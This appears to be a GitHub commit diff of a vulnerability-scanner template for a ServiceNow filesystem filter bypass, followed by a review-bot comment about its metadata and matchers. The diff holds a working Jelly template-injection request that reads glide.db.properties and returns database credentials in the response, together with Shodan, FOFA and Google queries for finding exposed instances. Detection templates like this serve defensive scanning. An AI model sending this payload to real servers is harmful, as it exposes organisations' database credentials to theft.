minor-update

patch-5
Dhiyaneshwaran 2024-07-11 12:43:50 +05:30 committed by GitHub
parent dfdc32e3a1
commit 20cb50d9f3
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 29 additions and 3 deletions


@ -4,11 +4,28 @@ info:
name: Service Now - Filesystem Filter Bypass
author: DhiyaneshDk
severity: high
reference:
- https://www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data
classification:
cpe: cpe:2.3:a:servicenow:servicenow:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: servicenow
product: servicenow
shodan-query:
- http.favicon.hash:1701804003
- http.title:"servicenow"
fofa-query:
- icon_hash=1701804003
- title="servicenow"
google-query: intitle:"servicenow"
tags: cve,cve2024,servicenow,rce
http:
- raw:
- |
GET /login.do?jvar_page_title=<style><j:jelly xmlns:j="jelly:core" xmlns:g='glide'><g:evaluate>z=new Packages.java.io.File("").getAbsolutePath();z=z.substring(0,z.lastIndexOf("/"));u=new SecurelyAccess(z.concat("/co..nf/glide.db.properties")).getBufferedReader();s="";while((q=u.readLine())!==null)s=s.concat(q,"\n");gs.addErrorMessage(s);</g:evaluate></j:jelly></style> HTTP/1.1
GET /login.do?jvar_page_title=<style><j:jelly+xmlns:j="jelly:core"+xmlns:g='glide'><g:evaluate>z=new+Packages.java.io.File("").getAbsolutePath();z=z.substring(0,z.lastIndexOf("/"));u=new+SecurelyAccess(z.concat("/co..nf/glide.db.properties")).getBufferedReader();s="";while((q=u.readLine())!==null)s=s.concat(q,"\n");gs.addErrorMessage(s);</g:evaluate></j:jelly></style> HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
@ -16,4 +33,13 @@ http:
- type: word
part: body
words:
- 'db.user'
- "glide.db.user"
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200
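Review bot: In the visible part of the `info` block the template is tagged `cve,cve2024` and `rce`, yet `classification` carries only a `cpe` and no `cve-id`, and no `description` or `remediation` appears between `severity` and `reference`, so whoever triages a finding cannot map it to an advisory or a fix. I would add `cve-id: <CVE-ID>` under `classification` (the id the tags refer to, which this page does not show), plus a short `description` and a `remediation` line pointing at the vendor patch. The rendered page has lost its +/- markers, so if both `'db.user'` and `"glide.db.user"` sit on the new side of the body matcher, the shorter word already matches everything the longer one does; keep only the more specific `"glide.db.user"` to limit false positives. A positive match means the response body holds lines from `glide.db.properties`, so the description should also say that scan output may contain database credentials and must be stored and shared as secret material.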